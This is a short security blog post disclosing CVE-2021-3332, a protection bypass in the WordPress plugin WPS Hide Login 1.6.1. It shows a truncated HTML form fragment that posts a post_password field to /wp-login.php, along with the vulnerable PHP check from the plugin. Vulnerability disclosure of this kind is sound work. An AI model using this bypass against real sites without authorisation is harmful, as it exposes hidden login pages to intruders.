Sebastian's Blog

software developer. security enthusiast.


WPS Hide Login 1.6.1 Protection Bypass (CVE-2021-3332)


The protective feature of WPS Hide Login can be bypassed by sending a crafted POST request containg the field post_password towards the default WordPress login url /wp-login.php.

<form id="form" method="post" action="">
	<input type="hidden" name="post_password"/>

window.onload = function(){

In file /classes/plugin.php on line 494 the plugin explicitly checks for the absence of this POST field but no else-case is defined.

        public function wp_loaded() {

                global $pagenow;

                $request = parse_url( rawurldecode( $_SERVER['REQUEST_URI'] ) );

                if ( ! isset( $_POST['post_password'] ) ) {

                        if ( is_admin() && ! is_user_logged_in() && ! defined( 'DOING_AJAX' ) && $pagenow !== 'admin-post.php' && $request['path'] !== '/wp-admin/options.php' ) {

Leave a Reply

Your email address will not be published. Required fields are marked *

The reCAPTCHA verification period has expired. Please reload the page.